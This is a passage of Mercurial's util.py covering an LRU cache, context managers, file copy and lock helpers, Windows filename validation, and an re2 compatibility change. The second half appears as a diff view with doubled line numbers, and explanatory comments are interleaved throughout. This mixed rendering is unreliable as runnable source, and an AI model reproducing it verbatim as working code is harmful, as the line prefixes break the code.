    """Base class for making a transactional type into a context manager."""

    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
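

# Illustrative sketch (not executed): a minimal subclass only needs close()
# and release(); __exit__ then guarantees release() always runs and close()
# is only called on a clean exit. 'demotxn' is hypothetical.
#
#   class demotxn(transactional):
#       def close(self):
#           pass  # commit
#
#       def release(self):
#           pass  # abort here if close() was never called
#
#   with demotxn():
#       pass  # work inside the transaction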


@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()
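

# Usage sketch (illustrative, not executed): unlike a plain transaction
# context, InterventionRequired still closes the transaction, so work
# recorded before the interruption survives. 'tr' is a hypothetical
# transaction and 'do_work' a hypothetical helper.
#
#   with acceptintervention(tr):
#       do_work()  # may raise error.InterventionRequired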


@contextlib.contextmanager
def nullcontextmanager(enter_result=None):
    yield enter_result


class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """

    __slots__ = ('next', 'prev', 'key', 'value', 'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0


class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new entry. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """

    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default

        assert node is not None  # help pytype
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        assert n is not None  # help pytype

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
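

# Usage sketch (illustrative, not executed): a cost-bounded cache. Once the
# total cost exceeds maxcost, oldest entries are pruned down to ~75% of the
# limit, as described in _enforcecostlimit() above.
#
#   d = lrucachedict(4, maxcost=100)
#   d.insert(b'a', b'x' * 60, cost=60)
#   d.insert(b'b', b'y' * 60, cost=60)  # evicts b'a' to get back under limit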


def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:

        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f


class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
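

# Usage sketch (illustrative, not executed): the computed value is stored in
# the instance __dict__ under the function's name, so it shadows the
# descriptor and the body runs at most once per object. 'compute' and the
# class are hypothetical.
#
#   class repoish(object):
#       @propertycache
#       def expensive(self):
#           return compute()  # only the first access runs this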


def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]


def increasingchunks(source, min=1024, max=65536):
    """return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max"""

    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield b''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield b''.join(buf)
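

# Usage sketch (illustrative, not executed): re-chunk a stream of small
# pieces into progressively larger writes; chunk sizes double from ~1k
# toward the 64k cap. 'out' is a hypothetical file object.
#
#   for chunk in increasingchunks(iter([b'a' * 512] * 100)):
#       out.write(chunk)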


def always(fn):
    return True


def never(fn):
    return False


def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
1816 1816 """
1817 1817
1818 1818 def wrapper(*args, **kwargs):
1819 1819 gcenabled = gc.isenabled()
1820 1820 gc.disable()
1821 1821 try:
1822 1822 return func(*args, **kwargs)
1823 1823 finally:
1824 1824 if gcenabled:
1825 1825 gc.enable()
1826 1826
1827 1827 return wrapper
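

# Usage sketch (illustrative, not executed): decorate a builder of huge
# containers so the cyclic GC cannot fire mid-construction.
#
#   @nogc
#   def _buildbigmap(items):  # hypothetical
#       return {k: v for k, v in items}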
1828 1828
1829 1829
1830 1830 if pycompat.ispypy:
1831 1831 # PyPy runs slower with gc disabled
1832 1832 nogc = lambda x: x
1833 1833
1834 1834
1835 1835 def pathto(root, n1, n2):
1836 1836 """return the relative path from one place to another.
1837 1837 root should use os.sep to separate directories
1838 1838 n1 should use os.sep to separate directories
1839 1839 n2 should use "/" to separate directories
1840 1840 returns an os.sep-separated path.
1841 1841
1842 1842 If n1 is a relative path, it is assumed to be
1843 1843 relative to root.
1844 1844 n2 should always be relative to root.
1845 1845 """
1846 1846 if not n1:
1847 1847 return localpath(n2)
1848 1848 if os.path.isabs(n1):
1849 1849 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1850 1850 return os.path.join(root, localpath(n2))
1851 1851 n2 = b'/'.join((pconvert(root), n2))
1852 1852 a, b = splitpath(n1), n2.split(b'/')
1853 1853 a.reverse()
1854 1854 b.reverse()
1855 1855 while a and b and a[-1] == b[-1]:
1856 1856 a.pop()
1857 1857 b.pop()
1858 1858 b.reverse()
1859 1859 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1860 1860
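# Illustrative example (POSIX separators assumed, names hypothetical):
# both n1 and n2 are relative to root, so only the non-shared suffixes
# contribute '..' steps and path components:
#
#   >>> pathto(b'/repo', b'a/b', b'a/c/x')
#   '../c/x'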
1861 1861
1862 1862 def checksignature(func, depth=1):
1863 1863 '''wrap a function with code to check for calling errors'''
1864 1864
1865 1865 def check(*args, **kwargs):
1866 1866 try:
1867 1867 return func(*args, **kwargs)
1868 1868 except TypeError:
1869 1869 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1870 1870 raise error.SignatureError
1871 1871 raise
1872 1872
1873 1873 return check
1874 1874
1875 1875
1876 1876 # a whitelist of known filesystems where hardlinks work reliably
1877 1877 _hardlinkfswhitelist = {
1878 1878 b'apfs',
1879 1879 b'btrfs',
1880 1880 b'ext2',
1881 1881 b'ext3',
1882 1882 b'ext4',
1883 1883 b'hfs',
1884 1884 b'jfs',
1885 1885 b'NTFS',
1886 1886 b'reiserfs',
1887 1887 b'tmpfs',
1888 1888 b'ufs',
1889 1889 b'xfs',
1890 1890 b'zfs',
1891 1891 }
1892 1892
1893 1893
1894 1894 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1895 1895 """copy a file, preserving mode and optionally other stat info like
1896 1896 atime/mtime
1897 1897
1898 1898 checkambig argument is used with filestat, and is useful only if
1899 1899 destination file is guarded by any lock (e.g. repo.lock or
1900 1900 repo.wlock).
1901 1901
1902 1902 copystat and checkambig should be exclusive.
1903 1903 """
1904 1904 assert not (copystat and checkambig)
1905 1905 oldstat = None
1906 1906 if os.path.lexists(dest):
1907 1907 if checkambig:
1908 1908 oldstat = checkambig and filestat.frompath(dest)
1909 1909 unlink(dest)
1910 1910 if hardlink:
1911 1911 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1912 1912 # unless we are confident that dest is on a whitelisted filesystem.
1913 1913 try:
1914 1914 fstype = getfstype(os.path.dirname(dest))
1915 1915 except OSError:
1916 1916 fstype = None
1917 1917 if fstype not in _hardlinkfswhitelist:
1918 1918 hardlink = False
1919 1919 if hardlink:
1920 1920 try:
1921 1921 oslink(src, dest)
1922 1922 return
1923 1923 except (IOError, OSError):
1924 1924 pass # fall back to normal copy
1925 1925 if os.path.islink(src):
1926 1926 os.symlink(os.readlink(src), dest)
1927 1927 # copytime is ignored for symlinks, but in general copytime isn't needed
1928 1928 # for them anyway
1929 1929 else:
1930 1930 try:
1931 1931 shutil.copyfile(src, dest)
1932 1932 if copystat:
1933 1933 # copystat also copies mode
1934 1934 shutil.copystat(src, dest)
1935 1935 else:
1936 1936 shutil.copymode(src, dest)
1937 1937 if oldstat and oldstat.stat:
1938 1938 newstat = filestat.frompath(dest)
1939 1939 if newstat.isambig(oldstat):
1940 1940 # stat of copied file is ambiguous to original one
1941 1941 advanced = (
1942 1942 oldstat.stat[stat.ST_MTIME] + 1
1943 1943 ) & 0x7FFFFFFF
1944 1944 os.utime(dest, (advanced, advanced))
1945 1945 except shutil.Error as inst:
1946 1946 raise error.Abort(stringutil.forcebytestr(inst))
1947 1947
1948 1948
1949 1949 def copyfiles(src, dst, hardlink=None, progress=None):
1950 1950 """Copy a directory tree using hardlinks if possible."""
1951 1951 num = 0
1952 1952
1953 1953 def settopic():
1954 1954 if progress:
1955 1955 progress.topic = _(b'linking') if hardlink else _(b'copying')
1956 1956
1957 1957 if os.path.isdir(src):
1958 1958 if hardlink is None:
1959 1959 hardlink = (
1960 1960 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1961 1961 )
1962 1962 settopic()
1963 1963 os.mkdir(dst)
1964 1964 for name, kind in listdir(src):
1965 1965 srcname = os.path.join(src, name)
1966 1966 dstname = os.path.join(dst, name)
1967 1967 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1968 1968 num += n
1969 1969 else:
1970 1970 if hardlink is None:
1971 1971 hardlink = (
1972 1972 os.stat(os.path.dirname(src)).st_dev
1973 1973 == os.stat(os.path.dirname(dst)).st_dev
1974 1974 )
1975 1975 settopic()
1976 1976
1977 1977 if hardlink:
1978 1978 try:
1979 1979 oslink(src, dst)
1980 1980 except (IOError, OSError):
1981 1981 hardlink = False
1982 1982 shutil.copy(src, dst)
1983 1983 else:
1984 1984 shutil.copy(src, dst)
1985 1985 num += 1
1986 1986 if progress:
1987 1987 progress.increment()
1988 1988
1989 1989 return hardlink, num
1990 1990
1991 1991
1992 1992 _winreservednames = {
1993 1993 b'con',
1994 1994 b'prn',
1995 1995 b'aux',
1996 1996 b'nul',
1997 1997 b'com1',
1998 1998 b'com2',
1999 1999 b'com3',
2000 2000 b'com4',
2001 2001 b'com5',
2002 2002 b'com6',
2003 2003 b'com7',
2004 2004 b'com8',
2005 2005 b'com9',
2006 2006 b'lpt1',
2007 2007 b'lpt2',
2008 2008 b'lpt3',
2009 2009 b'lpt4',
2010 2010 b'lpt5',
2011 2011 b'lpt6',
2012 2012 b'lpt7',
2013 2013 b'lpt8',
2014 2014 b'lpt9',
2015 2015 }
2016 2016 _winreservedchars = b':*?"<>|'
2017 2017
2018 2018
2019 2019 def checkwinfilename(path):
2020 2020 r"""Check that the base-relative path is a valid filename on Windows.
2021 2021 Returns None if the path is ok, or a UI string describing the problem.
2022 2022
2023 2023 >>> checkwinfilename(b"just/a/normal/path")
2024 2024 >>> checkwinfilename(b"foo/bar/con.xml")
2025 2025 "filename contains 'con', which is reserved on Windows"
2026 2026 >>> checkwinfilename(b"foo/con.xml/bar")
2027 2027 "filename contains 'con', which is reserved on Windows"
2028 2028 >>> checkwinfilename(b"foo/bar/xml.con")
2029 2029 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2030 2030 "filename contains 'AUX', which is reserved on Windows"
2031 2031 >>> checkwinfilename(b"foo/bar/bla:.txt")
2032 2032 "filename contains ':', which is reserved on Windows"
2033 2033 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2034 2034 "filename contains '\\x07', which is invalid on Windows"
2035 2035 >>> checkwinfilename(b"foo/bar/bla ")
2036 2036 "filename ends with ' ', which is not allowed on Windows"
2037 2037 >>> checkwinfilename(b"../bar")
2038 2038 >>> checkwinfilename(b"foo\\")
2039 2039 "filename ends with '\\', which is invalid on Windows"
2040 2040 >>> checkwinfilename(b"foo\\/bar")
2041 2041 "directory name ends with '\\', which is invalid on Windows"
2042 2042 """
2043 2043 if path.endswith(b'\\'):
2044 2044 return _(b"filename ends with '\\', which is invalid on Windows")
2045 2045 if b'\\/' in path:
2046 2046 return _(b"directory name ends with '\\', which is invalid on Windows")
2047 2047 for n in path.replace(b'\\', b'/').split(b'/'):
2048 2048 if not n:
2049 2049 continue
2050 2050 for c in _filenamebytestr(n):
2051 2051 if c in _winreservedchars:
2052 2052 return (
2053 2053 _(
2054 2054 b"filename contains '%s', which is reserved "
2055 2055 b"on Windows"
2056 2056 )
2057 2057 % c
2058 2058 )
2059 2059 if ord(c) <= 31:
2060 2060 return _(
2061 2061 b"filename contains '%s', which is invalid on Windows"
2062 2062 ) % stringutil.escapestr(c)
2063 2063 base = n.split(b'.')[0]
2064 2064 if base and base.lower() in _winreservednames:
2065 2065 return (
2066 2066 _(b"filename contains '%s', which is reserved on Windows")
2067 2067 % base
2068 2068 )
2069 2069 t = n[-1:]
2070 2070 if t in b'. ' and n not in b'..':
2071 2071 return (
2072 2072 _(
2073 2073 b"filename ends with '%s', which is not allowed "
2074 2074 b"on Windows"
2075 2075 )
2076 2076 % t
2077 2077 )
2078 2078
2079 2079
2080 2080 timer = getattr(time, "perf_counter", None)
2081 2081
2082 2082 if pycompat.iswindows:
2083 2083 checkosfilename = checkwinfilename
2084 2084 if not timer:
2085 2085 timer = time.clock
2086 2086 else:
2087 2087 # mercurial.windows doesn't have platform.checkosfilename
2088 2088 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2089 2089 if not timer:
2090 2090 timer = time.time
2091 2091
2092 2092
2093 2093 def makelock(info, pathname):
2094 2094 """Create a lock file atomically if possible
2095 2095
2096 2096 This may leave a stale lock file if symlinks aren't supported and
2097 2097 signal interrupts are enabled.
2098 2098 """
2099 2099 try:
2100 2100 return os.symlink(info, pathname)
2101 2101 except OSError as why:
2102 2102 if why.errno == errno.EEXIST:
2103 2103 raise
2104 2104 except AttributeError: # no symlink in os
2105 2105 pass
2106 2106
2107 2107 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2108 2108 ld = os.open(pathname, flags)
2109 2109 os.write(ld, info)
2110 2110 os.close(ld)
2111 2111
2112 2112
2113 2113 def readlock(pathname):
2114 2114 try:
2115 2115 return readlink(pathname)
2116 2116 except OSError as why:
2117 2117 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2118 2118 raise
2119 2119 except AttributeError: # no symlink in os
2120 2120 pass
2121 2121 with posixfile(pathname, b'rb') as fp:
2122 2122 return fp.read()
2123 2123
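# Hedged usage sketch (lock content format illustrative): where symlinks
# exist, the lock is a dangling symlink whose target carries the holder
# info; otherwise it is an O_EXCL-created regular file. readlock()
# recovers the info either way.
#
#   makelock(b'somehost:12345', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')   # -> b'somehost:12345'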
2124 2124
2125 2125 def fstat(fp):
2126 2126 '''stat file object that may not have fileno method.'''
2127 2127 try:
2128 2128 return os.fstat(fp.fileno())
2129 2129 except AttributeError:
2130 2130 return os.stat(fp.name)
2131 2131
2132 2132
2133 2133 # File system features
2134 2134
2135 2135
2136 2136 def fscasesensitive(path):
2137 2137 """
2138 2138 Return true if the given path is on a case-sensitive filesystem
2139 2139
2140 2140 Requires a path (like /foo/.hg) ending with a foldable final
2141 2141 directory component.
2142 2142 """
2143 2143 s1 = os.lstat(path)
2144 2144 d, b = os.path.split(path)
2145 2145 b2 = b.upper()
2146 2146 if b == b2:
2147 2147 b2 = b.lower()
2148 2148 if b == b2:
2149 2149 return True # no evidence against case sensitivity
2150 2150 p2 = os.path.join(d, b2)
2151 2151 try:
2152 2152 s2 = os.lstat(p2)
2153 2153 if s2 == s1:
2154 2154 return False
2155 2155 return True
2156 2156 except OSError:
2157 2157 return True
2158 2158
2159 2159
2160 _re2_input = lambda x: x
2160 2161 try:
2161 2162 import re2 # pytype: disable=import-error
2162 2163
2163 2164 _re2 = None
2164 2165 except ImportError:
2165 2166 _re2 = False
2166 2167
2167 2168
2168 2169 class _re(object):
2169 2170 def _checkre2(self):
2170 2171 global _re2
2172 global _re2_input
2171 2173 try:
2172 2174 # check if match works, see issue3964
2173 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2175 check_pattern = br'\[([^\[]+)\]'
2176 check_input = b'[ui]'
2177 _re2 = bool(re2.match(check_pattern, check_input))
2174 2178 except ImportError:
2175 2179 _re2 = False
2180 except TypeError:
2181 # the `pyre-2` project provides a re2 module that accepts bytes
2182 # the `fb-re2` project provides a re2 module that accepts sysstr
2183 check_pattern = pycompat.sysstr(check_pattern)
2184 check_input = pycompat.sysstr(check_input)
2185 _re2 = bool(re2.match(check_pattern, check_input))
2186 _re2_input = pycompat.sysstr
2176 2187
2177 2188 def compile(self, pat, flags=0):
2178 2189 """Compile a regular expression, using re2 if possible
2179 2190
2180 2191 For best performance, use only re2-compatible regexp features. The
2181 2192 only flags from the re module that are re2-compatible are
2182 2193 IGNORECASE and MULTILINE."""
2183 2194 if _re2 is None:
2184 2195 self._checkre2()
2185 2196 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2186 2197 if flags & remod.IGNORECASE:
2187 2198 pat = b'(?i)' + pat
2188 2199 if flags & remod.MULTILINE:
2189 2200 pat = b'(?m)' + pat
2190 2201 try:
2191 return re2.compile(pat)
2202 return re2.compile(_re2_input(pat))
2192 2203 except re2.error:
2193 2204 pass
2194 2205 return remod.compile(pat, flags)
2195 2206
2196 2207 @propertycache
2197 2208 def escape(self):
2198 2209 """Return the version of escape corresponding to self.compile.
2199 2210
2200 2211 This is imperfect because whether re2 or re is used for a particular
2201 2212 function depends on the flags, etc, but it's the best we can do.
2202 2213 """
2203 2214 global _re2
2204 2215 if _re2 is None:
2205 2216 self._checkre2()
2206 2217 if _re2:
2207 2218 return re2.escape
2208 2219 else:
2209 2220 return remod.escape
2210 2221
2211 2222
2212 2223 re = _re()
2213 2224
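# Illustrative usage of the module-level shim: patterns compile through
# re2 when available and transparently fall back to the stdlib re module.
# Only the IGNORECASE and MULTILINE flags keep re2 eligible.
#
#   >>> pat = re.compile(br'^[a-f0-9]+$', remod.IGNORECASE)
#   >>> bool(pat.match(b'DEADBEEF'))
#   True
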
2214 2225 _fspathcache = {}
2215 2226
2216 2227
2217 2228 def fspath(name, root):
2218 2229 """Get name in the case stored in the filesystem
2219 2230
2220 2231 The name should be relative to root, and be normcase-ed for efficiency.
2221 2232
2222 2233 Note that this function is unnecessary, and should not be
2223 2234 called, for case-sensitive filesystems (simply because it's expensive).
2224 2235
2225 2236 The root should be normcase-ed, too.
2226 2237 """
2227 2238
2228 2239 def _makefspathcacheentry(dir):
2229 2240 return {normcase(n): n for n in os.listdir(dir)}
2230 2241
2231 2242 seps = pycompat.ossep
2232 2243 if pycompat.osaltsep:
2233 2244 seps = seps + pycompat.osaltsep
2234 2245 # Protect backslashes. This gets silly very quickly.
2235 2246 seps = seps.replace(b'\\', b'\\\\')
2236 2247 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2237 2248 dir = os.path.normpath(root)
2238 2249 result = []
2239 2250 for part, sep in pattern.findall(name):
2240 2251 if sep:
2241 2252 result.append(sep)
2242 2253 continue
2243 2254
2244 2255 if dir not in _fspathcache:
2245 2256 _fspathcache[dir] = _makefspathcacheentry(dir)
2246 2257 contents = _fspathcache[dir]
2247 2258
2248 2259 found = contents.get(part)
2249 2260 if not found:
2250 2261 # retry "once per directory" per "dirstate.walk", which
2251 2262 # may take place for each patch of "hg qpush", for example
2252 2263 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2253 2264 found = contents.get(part)
2254 2265
2255 2266 result.append(found or part)
2256 2267 dir = os.path.join(dir, part)
2257 2268
2258 2269 return b''.join(result)
2259 2270
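# Hypothetical example on a case-insensitive filesystem: given a file
# stored on disk as 'Foo/Bar.txt' under root, a normcase-ed lookup
# recovers the stored spelling:
#
#   fspath(b'foo/bar.txt', b'/path/to/root')   # -> b'Foo/Bar.txt'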
2260 2271
2261 2272 def checknlink(testfile):
2262 2273 '''check whether hardlink count reporting works properly'''
2263 2274
2264 2275 # testfile may be open, so we need a separate file for checking to
2265 2276 # work around issue2543 (or testfile may get lost on Samba shares)
2266 2277 f1, f2, fp = None, None, None
2267 2278 try:
2268 2279 fd, f1 = pycompat.mkstemp(
2269 2280 prefix=b'.%s-' % os.path.basename(testfile),
2270 2281 suffix=b'1~',
2271 2282 dir=os.path.dirname(testfile),
2272 2283 )
2273 2284 os.close(fd)
2274 2285 f2 = b'%s2~' % f1[:-2]
2275 2286
2276 2287 oslink(f1, f2)
2277 2288 # nlinks() may behave differently for files on Windows shares if
2278 2289 # the file is open.
2279 2290 fp = posixfile(f2)
2280 2291 return nlinks(f2) > 1
2281 2292 except OSError:
2282 2293 return False
2283 2294 finally:
2284 2295 if fp is not None:
2285 2296 fp.close()
2286 2297 for f in (f1, f2):
2287 2298 try:
2288 2299 if f is not None:
2289 2300 os.unlink(f)
2290 2301 except OSError:
2291 2302 pass
2292 2303
2293 2304
2294 2305 def endswithsep(path):
2295 2306 '''Check path ends with os.sep or os.altsep.'''
2296 2307 return (
2297 2308 path.endswith(pycompat.ossep)
2298 2309 or pycompat.osaltsep
2299 2310 and path.endswith(pycompat.osaltsep)
2300 2311 )
2301 2312
2302 2313
2303 2314 def splitpath(path):
2304 2315 """Split path by os.sep.
2305 2316 Note that this function does not use os.altsep because this is
2306 2317 an alternative to the simpler "xxx.split(os.sep)".
2307 2318 It is recommended to use os.path.normpath() before using this
2308 2319 function if needed."""
2309 2320 return path.split(pycompat.ossep)
2310 2321
2311 2322
2312 2323 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2313 2324 """Create a temporary file with the same contents from name
2314 2325
2315 2326 The permission bits are copied from the original file.
2316 2327
2317 2328 If the temporary file is going to be truncated immediately, you
2318 2329 can use emptyok=True as an optimization.
2319 2330
2320 2331 Returns the name of the temporary file.
2321 2332 """
2322 2333 d, fn = os.path.split(name)
2323 2334 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2324 2335 os.close(fd)
2325 2336 # Temporary files are created with mode 0600, which is usually not
2326 2337 # what we want. If the original file already exists, just copy
2327 2338 # its mode. Otherwise, manually obey umask.
2328 2339 copymode(name, temp, createmode, enforcewritable)
2329 2340
2330 2341 if emptyok:
2331 2342 return temp
2332 2343 try:
2333 2344 try:
2334 2345 ifp = posixfile(name, b"rb")
2335 2346 except IOError as inst:
2336 2347 if inst.errno == errno.ENOENT:
2337 2348 return temp
2338 2349 if not getattr(inst, 'filename', None):
2339 2350 inst.filename = name
2340 2351 raise
2341 2352 ofp = posixfile(temp, b"wb")
2342 2353 for chunk in filechunkiter(ifp):
2343 2354 ofp.write(chunk)
2344 2355 ifp.close()
2345 2356 ofp.close()
2346 2357 except: # re-raises
2347 2358 try:
2348 2359 os.unlink(temp)
2349 2360 except OSError:
2350 2361 pass
2351 2362 raise
2352 2363 return temp
2353 2364
2354 2365
2355 2366 class filestat(object):
2356 2367 """help to exactly detect change of a file
2357 2368
2358 2369 'stat' attribute is result of 'os.stat()' if specified 'path'
2359 2370 exists. Otherwise, it is None. This can avoid preparative
2360 2371 'exists()' examination on client side of this class.
2361 2372 """
2362 2373
2363 2374 def __init__(self, stat):
